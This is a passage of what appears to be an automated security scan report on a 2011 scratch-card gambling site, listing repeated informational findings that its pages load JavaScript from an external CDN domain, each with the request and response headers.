<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.54. https://scratch.betsson.com/en/Classic/3-Wow

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/3-Wow

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:38 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.55. https://scratch.betsson.com/en/Classic/7th-Heaven

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/7th-Heaven

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/7th-Heaven HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:40 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.56. https://scratch.betsson.com/en/Classic/Champagne

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Champagne

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Champagne HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:27 GMT
Connection: close
Content-Length: 102692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Golden-Fortune

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Golden-Fortune HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:55 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Happy-Birthday

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Happy-Birthday HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:57 GMT
Connection: close
Content-Length: 102696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Jungle-Joy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Jungle-Joy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:43 GMT
Connection: close
Content-Length: 102706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.60. https://scratch.betsson.com/en/Classic/Neighbors

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Neighbors

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Neighbors HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:25 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.61. https://scratch.betsson.com/en/Classic/Spy-Comics

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Spy-Comics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Spy-Comics HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:38 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Super-3-Wow

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Super-3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:51 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Tiger-Mahjong

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Tiger-Mahjong HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:49 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.64. https://scratch.betsson.com/en/Classic/Wild-West

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Wild-West

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/Wild-West HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:04 GMT
Connection: close
Content-Length: 102697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.65. https://scratch.betsson.com/en/Classic/XO

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/XO

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic/XO HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:29 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.66. https://scratch.betsson.com/en/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Default.aspx HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:35 GMT
Connection: close
Content-Length: 160212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.67. https://scratch.betsson.com/en/FAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/FAQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/FAQ HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:50 GMT
Connection: close
Content-Length: 103308


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.68. https://scratch.betsson.com/en/Fantasy

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Fantasy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
